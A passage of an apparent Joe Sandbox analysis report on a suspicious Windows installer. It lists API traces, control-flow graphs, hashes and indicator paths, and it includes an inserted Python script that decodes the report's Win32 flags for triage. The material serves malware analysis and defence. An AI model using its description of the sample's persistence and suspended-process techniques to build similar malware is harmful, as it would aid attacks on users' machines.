• RegCloseKey.ADVAPI32(?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 004025E5
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same twelve dump regions listed under the preceding function's Memory Dump Source
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: CloseValuelstrlen
• String ID: hattepuldes\Stethospasm84\
• API String ID: 2655323295-3628054739
• Opcode ID: 9a6c6d883b07e3aa4fb4fac5b967dc2d5c57ac0b71ef490e589c7d9f7fbbccc2
• Instruction ID: 621c84a53dcaf2a3225fca01673abe6cb58a25da7017df2cdf0d3381b538cbef
• Opcode Fuzzy Hash: 9a6c6d883b07e3aa4fb4fac5b967dc2d5c57ac0b71ef490e589c7d9f7fbbccc2
• Instruction Fuzzy Hash: A1118171E00214BFEF10AFA5DE49EAE7A74EB44314F20843AF505F71D1D6B99D419B28

Control-flow Graph (basic blocks and edges, recovered from the graph rendering)
• 673: 4015bb-4015ce call 402bce, call 405b05 -> 678, 679
• 678: 4015d0-4015e3 call 405a97 -> 686, 687
• 679: 401624-401627 -> 681, 682
• 681: 401652-4022e2 call 401423 -> 696
• 682: 401629-401644 call 401423, call 4060d4, SetCurrentDirectoryA -> 696, 698
• 686: 4015e5-4015e8 -> 687, 691
• 687: 4015fb-4015fc call 40573e -> 694
• 691: 4015ea-4015f1 call 40575b -> 687, 703
• 694: 401601-401603 -> 699, 700
• 696: 402a5a-402a69
• 698: 40164a-40164d -> 696
• 699: 401605-40160a -> 704, 705
• 700: 40161a-401622 -> 678, 679
• 703: 4015f3-4015f9 call 4056c1 -> 694
• 704: 401617 -> 700
• 705: 40160c-401615 GetFileAttributesA -> 700, 704
APIs
  • Part of subcall function 00405B05: CharNextA.USER32(?,?,007A0970,?,00405B71,007A0970,007A0970,75923410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
  • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
  • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C
• GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
  • Part of subcall function 004056C1: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704
• SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution,00000000,00000000,000000F0), ref: 0040163C
Strings
• C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution, xrefs: 00401631
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same twelve dump regions listed under the preceding function's Memory Dump Source
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID: C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution
• API String ID: 1892508949-1527842708
• Opcode ID: 0633b04426b33a91403708f63f53e35a8aea6b13c15c91267645d809cf00bc01
• Instruction ID: 50be7771e3672f66fe07c9109d7a0934d5fb35c2f40f106ce03ebb8fd80801ba
• Opcode Fuzzy Hash: 0633b04426b33a91403708f63f53e35a8aea6b13c15c91267645d809cf00bc01
• Instruction Fuzzy Hash: F2110831104151EBCB307FA54D409BF37B09A92324B28463FE592B22E3DA3D4942AA2E

Control-flow Graph (basic blocks and edges, recovered from the graph rendering)
• 709: 405fbb-405fed call 405f5a -> 712, 713
• 712: 40602a -> 715
• 713: 405fef-40601c RegQueryValueExA, RegCloseKey -> 712, 714
• 714: 40601e-406022 -> 715, 716
• 715: 40602d-40602f
• 716: 406024-406028 -> 712, 715
APIs
• RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,00406270,80000002), ref: 00406001
• RegCloseKey.KERNELBASE(?,?,00406270,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,subterritories), ref: 0040600C
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same twelve dump regions listed under the preceding function's Memory Dump Source
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: CloseQueryValue
• String ID: : Completed
• API String ID: 3356406503-2954849223
• Opcode ID: 02b0ca06b85e7c04b5820a528fa41c7769f17ba5f8155b904997ba725fa221fb
• Instruction ID: d626b699d45c1b84179135bbe24e0f50758a75bbb6c39e90c48a844674782db3
• Opcode Fuzzy Hash: 02b0ca06b85e7c04b5820a528fa41c7769f17ba5f8155b904997ba725fa221fb
• Instruction Fuzzy Hash: BB017C7254020AABDF22CF61CC09FDB3FA8EF55364F01803AF959A2190D678D964DBA4

                                                                                                     Control-flow Graph (rendered graph not preserved; the executed / not-executed colouring is lost, the node list below is recovered from the page)
                                                                                                     • Node 717: 405773-4057a4, calls CreateProcessA; edges to 718 and 719
                                                                                                     • Node 719: 4057a6-4057af, calls CloseHandle; edge to 718
                                                                                                     • Node 718: 4057b2-4057b3, no outgoing edges
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D70,Error launching installer), ref: 0040579C
                                                                                                    • CloseHandle.KERNEL32(?), ref: 004057A9
                                                                                                    Strings
                                                                                                    • Error launching installer, xrefs: 00405786
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                    • String ID: Error launching installer
                                                                                                    • API String ID: 3712363035-66219284
                                                                                                    • Opcode ID: cdb3d12e93955e9b982c1d5c04e4c9d7882df22fc18f803694ab679cdbae7595
                                                                                                    • Instruction ID: 33f777635f039691b801aef677aa15ec1976f60057d2e453273d56c3b7e761be
                                                                                                    • Opcode Fuzzy Hash: cdb3d12e93955e9b982c1d5c04e4c9d7882df22fc18f803694ab679cdbae7595
                                                                                                    • Instruction Fuzzy Hash: 58E04FF5600209BFEB009BA0DD09F7B7BACEB04304F008520BD40F2190D774A8148E78
                                                                                                    APIs
                                                                                                    • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                                                                    • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 004025CD
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 004025E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Enum$CloseValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 397863658-0
                                                                                                    • Opcode ID: 5b71ec222b19f08e17faa31cd346880740b6c824b10cdee8db70d0fa459cde75
                                                                                                    • Instruction ID: 773a7303ee78c1acb854ba03901dd4e05cd3950a579afad538e8a0ffc4c9b84d
                                                                                                    • Opcode Fuzzy Hash: 5b71ec222b19f08e17faa31cd346880740b6c824b10cdee8db70d0fa459cde75
                                                                                                    • Instruction Fuzzy Hash: 5A018F71604204FFE7219F54DE99ABF7ABCEF41358F20803EF505B61C0DAB84E459629
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 004025E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseQueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3356406503-0
                                                                                                    • Opcode ID: bd6cd76112630bcbd7e0f5c7a8ef03fc241a29f4c9c3f225f081d49a75508afb
                                                                                                    • Instruction ID: a38d896beb00bd6b96c1afca0a4d37843b6a01bbd6b744c8c042ddc4311e4418
                                                                                                    • Opcode Fuzzy Hash: bd6cd76112630bcbd7e0f5c7a8ef03fc241a29f4c9c3f225f081d49a75508afb
                                                                                                    • Instruction Fuzzy Hash: E911BF71901205EFDF24CF64CA985AE7AB4EF01355F20843FE446B72C0D6B88A85DB19
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: e0cd62ee3040700a295e5b46d32f75e08d2db3f93dbac9e55f4e6f2709676977
                                                                                                    • Instruction ID: 845b7e25721e970e15b242f5633496821e9acd9660688f654d55c439198c0cfc
                                                                                                    • Opcode Fuzzy Hash: e0cd62ee3040700a295e5b46d32f75e08d2db3f93dbac9e55f4e6f2709676977
                                                                                                    • Instruction Fuzzy Hash: 0701F4316242209FE7195B389D04B2A3698E751314F10813FF951F65F2D678CC129B4C
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnableShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1136574915-0
                                                                                                    • Opcode ID: 0ff81ee1c010caf08d5018515d9ac3da577e4609dff467edd0ef4c3ea6212f24
                                                                                                    • Instruction ID: 0d648207ff9f6deaa2b416c319ca4d02dfd5ede2de2ab3ccb6edf8448476ab2e
                                                                                                    • Opcode Fuzzy Hash: 0ff81ee1c010caf08d5018515d9ac3da577e4609dff467edd0ef4c3ea6212f24
                                                                                                    • Instruction Fuzzy Hash: 3AE09232A04200EFD714EFA5EA8856F7BB0EB40325B20403FF001F10C1CA7848418A59
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(0001044A), ref: 00401581
                                                                                                    • ShowWindow.USER32(00010444), ref: 00401596
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1268545403-0
                                                                                                    • Opcode ID: 651c37bc6638362237d797d4381c0091f2d3ab27754a1e837ea31ce37a84f4b0
                                                                                                    • Instruction ID: 3a11bc7633d557fca9bfeaeb01eb6d797b1cc6e91976234f83cec9dd727a21ac
                                                                                                    • Opcode Fuzzy Hash: 651c37bc6638362237d797d4381c0091f2d3ab27754a1e837ea31ce37a84f4b0
                                                                                                    • Instruction Fuzzy Hash: 66E086727101109FC718DF58ED9087F73A5EBC5310310853FE603B3291C6789D018E28
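The per-function API listings above (and the GetProcAddress / LoadLibraryExA listing that follows) are the part of this report a triager actually works from, but the constants in them are raw hex. The script below is an added example, written for this page; it is not Joe Sandbox code and not code recovered from the sample. It parses the report's API lines, including the indented "Part of subcall function" entries and the argument-less wsprintfA line, and decodes the arguments that carry meaning: the CreateProcessA creation flags, the LoadLibraryExA flags, the SendMessageA message number and two buffer sizes. The SAMPLE_ENTRIES text is copied from this report's listings; flag values and parameter positions come from the documented Win32 signatures. Two caveats that the code comments repeat: the sandbox dumps stack slots past an API's real parameter count (RegCloseKey is shown with ten arguments although it takes one), so nothing beyond the documented arity is decoded, and a string such as the registry path in RegCloseKey's argument list is stack residue, not necessarily that call's input. Decoding this report's CreateProcessA at 0040579C gives CREATE_DEFAULT_ERROR_MODE only, without CREATE_SUSPENDED, so that call is not the suspended-mode launch flagged in the signatures.

```python
"""Parse Joe Sandbox per-function API entries and decode their constants.
Added example for this page: not Joe Sandbox code, not code from the sample.
Parameter positions and flag values follow the documented Win32 signatures."""
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Callable, Optional, Union

Arg = Union[int, str, None]   # 8-digit hex immediate, string literal, or "?" (not recovered)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                      # stack slots as the sandbox recovered them
    ref: int                        # call-site address (the "ref:" field)
    subcall: Optional[int] = None   # set for "Part of subcall function X:" lines


# One report line: optional subcall prefix, Api.MODULE, optional (args), ", ref: ADDR".
# The wsprintfA entry carries no argument list at all, hence the optional group.
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):   # a literal string of exactly 8 hex chars would be misread
        return int(tok, 16)
    return tok


def parse_entries(text: str) -> list[ApiCall]:
    """Parse every API line in a pasted block; section headers such as 'APIs' are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls


# Values from the Windows SDK headers (winbase.h, libloaderapi.h).
CREATE_PROCESS_FLAGS = {
    0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE", 0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE", 0x08000000: "CREATE_NO_WINDOW",
}
LOAD_LIBRARY_FLAGS = {
    0x00000001: "DONT_RESOLVE_DLL_REFERENCES", 0x00000002: "LOAD_LIBRARY_AS_DATAFILE",
    0x00000008: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x00000800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
}


def _decode_flags(value: int, table: dict[int, str]) -> str:
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)           # bits the table does not know are kept as hex
    if leftover:
        names.append(f"0x{leftover:X}")
    return "|".join(names) if names else "0"


def _window_message(value: int) -> str:
    # Messages at or above WM_USER (0x400) are control-specific: 0x402 is PBM_SETPOS only
    # if the target window is a progress bar, so report it relative to WM_USER, not by name.
    return f"WM_USER+0x{value - 0x400:X}" if value >= 0x400 else f"0x{value:X}"


# (argument index, parameter name, decoder). Indices follow the documented parameter order.
# The sandbox lists stack slots past the real parameters (RegCloseKey shows ten arguments,
# it takes one), so never decode a position beyond the documented arity.
DECODERS: dict[str, list[tuple[int, str, Callable[[int], str]]]] = {
    "CreateProcessA":      [(5, "dwCreationFlags", lambda v: _decode_flags(v, CREATE_PROCESS_FLAGS))],
    "LoadLibraryExA":      [(2, "dwFlags",         lambda v: _decode_flags(v, LOAD_LIBRARY_FLAGS))],
    "SendMessageA":        [(1, "Msg",             _window_message)],
    "RegEnumKeyA":         [(3, "cchName",         str)],   # buffer size, decimal
    "GetSystemDirectoryA": [(1, "uSize",           str)],   # buffer size, decimal (0x104 = MAX_PATH)
}


def decode(call: ApiCall) -> dict[str, str]:
    out = {}
    for idx, name, fn in DECODERS.get(call.api, []):
        if idx < len(call.args) and isinstance(call.args[idx], int):
            out[name] = fn(call.args[idx])
    return out


def creates_suspended(call: ApiCall) -> bool:
    """True when a CreateProcessA entry carries CREATE_SUSPENDED (the usual prelude to
    writing into a child before it runs)."""
    return (call.api == "CreateProcessA" and len(call.args) > 5
            and isinstance(call.args[5], int) and bool(call.args[5] & 0x4))


def summarize(text: str) -> list[str]:
    lines = []
    for c in parse_entries(text):
        line = f"{c.ref:08X} {c.api}"
        decoded = decode(c)
        if decoded:
            line += " " + " ".join(f"{k}={v}" for k, v in decoded.items())
        if c.subcall is not None:
            line += f" (subcall of {c.subcall:08X})"
        lines.append(line)
    return lines


# Constructed input: API lines copied from the function listings of this report.
SAMPLE_ENTRIES = r"""
APIs
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D70,Error launching installer), ref: 0040579C
• CloseHandle.KERNEL32(?), ref: 004057A9
• RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
• RegCloseKey.ADVAPI32(?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 004025E5
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
• GetProcAddress.KERNEL32(00000000,?), ref: 0040650A
  • Part of subcall function 0040646F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406486
  • Part of subcall function 0040646F: wsprintfA.USER32 ref: 004064BF
  • Part of subcall function 0040646F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064D3
"""

if __name__ == "__main__":
    for entry in summarize(SAMPLE_ENTRIES):
        print(entry)
```

Paste any "APIs" block from the report into SAMPLE_ENTRIES, or read it from a file, and extend DECODERS with further (index, name, decoder) triples for the APIs you care about; keeping the parameter index inside the documented arity is what makes the decoder safe against the trailing stack residue the sandbox prints.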
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040650A
                                                                                                      • Part of subcall function 0040646F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406486
                                                                                                      • Part of subcall function 0040646F: wsprintfA.USER32 ref: 004064BF
                                                                                                      • Part of subcall function 0040646F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
• Instruction ID: 042920e8a29c9b7d047f9b8d679db2b98f9cdac4fa712678353772f8bdeb7375
• Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
• Instruction Fuzzy Hash: 6EE0863260421167D6105B70BE0493B72A89E84700302043EF546F6144DB38DC769A6D
APIs
• GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\dP5z8RpEyQ.exe,80000000,00000003), ref: 00405C71
• CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
• Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
• Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
• Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
APIs
• GetFileAttributesA.KERNELBASE(?,?,00405860,?,?,00000000,00405A43,?,?,?,?), ref: 00405C4D
• SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C61
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
